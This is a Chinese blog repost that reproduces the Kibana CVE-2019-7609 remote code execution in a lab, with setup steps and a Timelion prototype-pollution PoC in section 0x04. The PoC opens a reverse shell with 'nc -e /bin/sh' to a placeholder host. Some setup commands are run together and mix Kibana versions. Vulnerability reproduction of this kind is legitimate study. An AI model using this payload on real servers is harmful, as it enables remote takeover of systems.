CVE-2019-7609:Kibana远程代码执行漏洞复现

Posted Timeline Sec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CVE-2019-7609:Kibana远程代码执行漏洞复现相关的知识,希望对你有一定的参考价值。

----------------------------------------------------------------------------------------

本文共1105字,阅读大约需要3分钟


0x00 简介


Kibana 是为 Elasticsearch设计的开源分析和可视化平台。你可以使用 Kibana 来搜索,查看存储在 Elasticsearch 索引中的数据并与之交互。你可以很容易实现高级的数据分析和可视化,以图标的形式展现出来。


0x01 漏洞概述


攻击者利用漏洞可以通过Timelion组件中的javascript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。


0x02 影响版本


Kibana < 6.6.1

Kibana < 5.6.15


0x03 环境搭建


本来是打算docker搭建的,奈何网络故障,索性直接kali搭建了

受影响的版本为Kibana < 6.6.0,这里选择了6.5.3进行搭建,修改虚拟机内存4G以上


1、Elasticsearch安装

a) 首先去官网下载6.5.3的tar包并解压

wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gztar -zxvf elasticsearch-6.5.3.tar.gz

b) 直接运行即可

cd elasticsearch-6.5.3./bin/elasticsearch


**此处有坑**:

i. es要用非root用户启动,否则会报` can not run elasticsearch as root`错误。

解决方法:使用非root用户启动即可。

ii. 如果前边是用root用户下载和解压的es,直接用普通用户启动时会报` AccessDeniedException`错误

解决方法:改文件属主

elk@kali:~$ sudo chown -R ubuntu ~/elasticsearch-6.5.3/

elk@kali:~$ sudo chgrp -R ubuntu ~/elasticsearch-6.5.3/

iii. es需要java支持,由于我是在kali上搭的,所以就没写java安装的过程(kali自带了openJDK)至于说java怎么装~emmm,是个好问题,百度去~


访问http://127.0.0.1:9200/,长这个样子就说明es启动成功了


2、Kibana安装

a) 官网下载压缩包并解压

wget https://artifacts.elastic.co/downloads/kibana/kibana-6.5.3-linux-x86_64.tar.gztar –zxvf kibana-5.4.3-linux-x86_64.tar.gz

b) 直接运行

cd kibana-5.4.3-linux-x86_64./bin/kibana


搭建成功,激动人心!

看一看版本号,嗯,是存在漏洞的样子~


CVE-2019-7609:Kibana远程代码执行漏洞复现


0x04 漏洞利用


漏洞点在Timelion处(名字和Timeline有点像)

直接填入Poc,过程和结果如图:


CVE-2019-7609:Kibana远程代码执行漏洞复现


CVE-2019-7609:Kibana远程代码执行漏洞复现


有种“做饭半小时,吃饭十分钟”的赶脚······【手动捂脸】


有人可能会说我的payload跟作者那个不一样呢,我这个就是换了个反弹shell的方法,作者那个不晓得为啥我kali上一弹就崩2333


Poc:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("nc -e /bin/sh xx.xx.xx.xx 4321");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')


0x05 修复方式


升级Kibana至新版本


参考链接:

https://slides.com/securitymb/prototype-pollution-in-kibana/

https://blog.csdn.net/sweeper_freedoman/article/details/86227778

https://www.elastic.co/guide/en/kibana/6.5/targz.html

https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077



悄悄点 在看,技术变精湛!

以上是关于CVE-2019-7609:Kibana远程代码执行漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

CVE-2019-7609 Kibana远程代码执行漏洞攻击方法和漏洞原理分析

Kibana 任意代码执行漏洞

最新漏洞预警Kibana远程代码执行漏洞

kibana-RCE <6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas)

漏洞预警Kibana < 6.6.0 代码执行漏洞

漏洞处置建议|Apache Tomcat远程代码执行漏洞处置建议